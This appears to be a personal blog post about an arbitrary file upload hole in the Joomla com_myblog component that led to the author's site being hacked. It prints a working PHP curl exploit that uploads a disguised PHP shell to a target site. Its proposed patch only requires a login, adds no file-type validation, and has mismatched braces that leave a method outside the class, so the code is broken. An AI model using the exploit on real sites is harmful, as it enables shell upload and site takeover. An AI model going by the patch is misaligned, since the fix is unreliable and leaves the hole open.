понедельник, 27 июля 2015 г.

How to fix Joomla com_Myblog Arbitrary File Upload Vulnerability

Today I have recived a message from my hosting provider informing that my web site has been hacked.
{HEX}php.nested.base64.534 : /home/user157/domains/mysite.com/public_html/images/blog/csc.php.xxxjpg
I have Joomla 1.5.26  web site and component my_blog 3.0.332 I quickly realised that the problem is because of 'ajax upload' I searched on Google and found this:

  1. <?php
  2. $uploadfile="yourshell.php.xxxjpg";
  3. $ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
  4. curl_setopt($ch, CURLOPT_POST, true);
  5. curl_setopt($ch, CURLOPT_POSTFIELDS,
  6. array('fileToUpload'=>"@$uploadfile"));
  7. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  8. $postResult = curl_exec($ch);
  9. curl_close($ch);
  10. print "$postResult";
  11. ?>

I tried to upload a file and I got:
 'file has been uploaded successfully'

How to fix Joomla com_Myblog Arbitrary File Upload Vulnerability?

Edit file

/components/com_myblog/task/ajaxupload.php


 <?php  
 /**  
  * @package          My Blog  
  * @copyright (C) 2008 by Slashes & Dots Sdn Bhd - All rights reserved!  
  * @license http://www.azrul.com Copyrighted Commercial Software  
  */  
 defined('_JEXEC') or die('Restricted access');  
 class MyblogAjaxuploadTask  
 {  
      function display()  
      {  
           $this->myxAjaxUpload();  
      }  
      function myxAjaxUpload()  
      {  
           $my          =& JFactory::getUser();  // get logged-in user
           if ($my->id == "0")  // if user not logged-in show error
           {  
                # If user not logged in, cannot use upload blog  
                echo '<div id="fp-content">';  
                echo JText::_('you must LOGIN');  
                echo '</div>';  
           }  
           else  // else original file
           {  
           global $_MY_CONFIG;  
           require_once( MY_LIBRARY_PATH . DS . 'imagebrowser.php' );  
           $retVal     = array('error' => '', 'msg' => '' , 'source' => '');  
           $resize     = JRequest::getVar( 'resize' , false , 'GET' );  
           //check if there are files uploaded  
           if( (isset($_FILES['fileToUpload']['error']) && $_FILES['fileToUpload'] == 0)   
           || (!empty($_FILES['fileToUpload']['tmp_name']) && $_FILES['fileToUpload']['tmp_name'] != 'none'))  
           {  
                $browser     = new MYMediaBrowser();  
                $retVal          = $browser->upload($_FILES['fileToUpload'], $resize);  
           }  
           else  
           {  
                $retVal['error'] = "No file has been uploaded.";  
           }  
           // Display JSON string to the caller  
           echo "{";  
           echo                    "error: '" . $retVal['error'] . "',\n";  
           // Test if 'source' index is set  
           if( isset($retVal['source']) && !empty($retVal['source']))  
           {  
                echo                    "msg: '" . $retVal['msg'] . "',\n";  
                echo                     "source: '" . $retVal['source'] . "'\n";  
           }  
           else  
           {  
                echo                    "msg: '" . $retVal['msg'] . "'\n";  
           }  
           echo "}";  
           exit;  
      }  
 }       
      function execute()  
      {  
           $this->myxAjaxUpload();  
      }  
 }